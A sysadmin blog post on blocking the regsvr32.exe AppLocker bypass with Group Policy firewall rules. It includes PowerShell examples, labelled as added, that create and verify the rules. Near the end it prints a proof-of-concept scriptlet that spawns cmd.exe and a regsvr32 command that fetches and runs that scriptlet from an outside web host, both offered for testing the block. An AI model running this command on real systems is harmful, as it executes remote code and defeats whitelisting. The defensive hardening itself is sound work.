A recently discovered method of bypassing AppLocker by using regsvr32.exe poses a threat to users on Windows 7, 8/8.1, and 10 (Professional or Enterprise editions). To work around this issue and prevent regsvr32 from accessing remote resources, you can block regsvr32.exe in the Windows Firewall. Taking it a step further, I have added a new GPO to block this domain-wide within my company. Here are some of my notes.
Create a GPO and Edit
In Group Policy Management, I created a new GPO and named it Firewall: Block regsvr32 then I edited it.
Navigate to Computer Configuration > Policies > Windows Settings > Security Settings > Windows Firewall with Advanced Security
Add a rule to both Inbound Rules and Outbound Rules to block regsvr32.exe.
Create a new inbound rule to block regsvr32.exe
Inbound Rule Wizard
Choose Program as the type of rule to create and click Next >
Use C:\Windows\System32\regsvr32.exe as the path; you can either type it in or click Browse… to navigate to it and choose it.
Choose Block as the action and click Next >
Apply it to all network locations.
Give the rule a name and possibly a description.
Rule to block is now listed in Inbound Rules
Outbound Rule Wizard
Repeat the steps from the Inbound Rule Wizard, but as a new rule under Outbound Rules.
Now that the GPO is created, you can link the policy within your domain as usual.
To test that the rule is effective, run gpupdate /force on your system to force an immediate security group policy application.
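The same two rules can be created without the wizard. The following is an added example, not part of the original post: it uses the GroupPolicy and NetSecurity PowerShell modules (RSAT) to create the GPO named in the post and write the inbound and outbound block rules straight into that GPO's firewall policy store. The domain name is a placeholder. Because regsvr32.exe also exists at %SystemRoot%\SysWOW64\regsvr32.exe on 64-bit Windows, the example blocks both copies rather than only the System32 path the wizard steps above use.

```powershell
# Added example (not from the original post). Requires RSAT: GroupPolicy and
# NetSecurity modules, run as a user who can edit GPOs in the domain.
$Domain  = "example.local"                 # placeholder: replace with your AD domain
$GpoName = "Firewall: Block regsvr32"      # name used in the post

# Both copies of regsvr32.exe on a 64-bit install; the SysWOW64 one is
# easy to overlook when only the System32 path is blocked.
$Programs = @(
    "%SystemRoot%\System32\regsvr32.exe",
    "%SystemRoot%\SysWOW64\regsvr32.exe"
)

# Create the GPO if it does not exist yet (it is not linked by this script)
if (-not (Get-GPO -Name $GpoName -Domain $Domain -ErrorAction SilentlyContinue)) {
    New-GPO -Name $GpoName -Domain $Domain | Out-Null
}

# "<domain>\<gpo name>" makes the *-NetFirewallRule cmdlets write to the GPO
# instead of the local firewall policy.
$Store = "$Domain\$GpoName"

foreach ($dir in "Inbound", "Outbound") {
    foreach ($prog in $Programs) {
        $arch = if ($prog -like "*SysWOW64*") { "32-bit" } else { "64-bit" }
        New-NetFirewallRule -PolicyStore $Store `
            -DisplayName "Block regsvr32.exe ($dir, $arch)" `
            -Description "Blocks regsvr32.exe network access (AppLocker bypass via remote scriptlet)" `
            -Direction $dir `
            -Action Block `
            -Program $prog `
            -Profile Any `
            -Enabled True | Out-Null
    }
}

# Show what now sits in the GPO before linking it
Get-NetFirewallRule -PolicyStore $Store |
    Where-Object DisplayName -like "Block regsvr32.exe*" |
    Select-Object DisplayName, Direction, Action, Profile, Enabled
```

After this runs, link the GPO to the target OU (for example with New-GPLink) exactly as you would for the wizard-created version; nothing is enforced until the link exists and clients refresh policy.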
I’ll leave the following backdoor.sct on my server if you want to test against it, or you can save the following to a file yourself (the extension doesn’t have to be .SCT; it can be anything…).
<!-- Proof Of Concept - Casey Smith @subTee -->
var r = new ActiveXObject("WScript.Shell").Run("cmd.exe");
Command to run:
regsvr32 /s /n /u /i:https://techish.net/pub/backdoor.sct scrobj.dll
If a command window opens, the GPO you created is not blocking it (for one reason or another; double-check your work).
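Watching for a command window is a manual check. As an added example (not from the original post), the following PowerShell run on a client after gpupdate lists the firewall rules the machine is actually enforcing for regsvr32.exe, so you can see whether the GPO rules arrived and which policy store they came from before running the test command. The display-name pattern is an assumption based on the rule name used in the post.

```powershell
# Added example (not from the original post): confirm on a domain-joined client
# that block rules for regsvr32.exe are active after a policy refresh.
gpupdate /force | Out-Null

# ActiveStore is the merged view of local policy plus every applied GPO,
# i.e. what the firewall engine is enforcing right now.
$active = Get-NetFirewallRule -PolicyStore ActiveStore | Where-Object {
    ($_ | Get-NetFirewallApplicationFilter).Program -match 'regsvr32\.exe$'
}

$active |
    Select-Object DisplayName, Direction, Action, Enabled, PolicyStoreSource |
    Format-Table -AutoSize

# The outbound block is the one that stops /i:<url> from fetching a scriptlet,
# so warn if it is missing or disabled.
$outboundBlock = $active | Where-Object {
    $_.Direction -eq 'Outbound' -and $_.Action -eq 'Block' -and $_.Enabled -eq 'True'
}
if (-not $outboundBlock) {
    Write-Warning "No enabled outbound block rule for regsvr32.exe is active on this host."
} else {
    Write-Host "Outbound block for regsvr32.exe is active (source: $($outboundBlock.PolicyStoreSource -join ', '))."
}
```

A PolicyStoreSource that names the GPO confirms the rule came from Group Policy rather than a local rule someone added by hand; a rule that shows up only in the local store will disappear on machines where nobody added it.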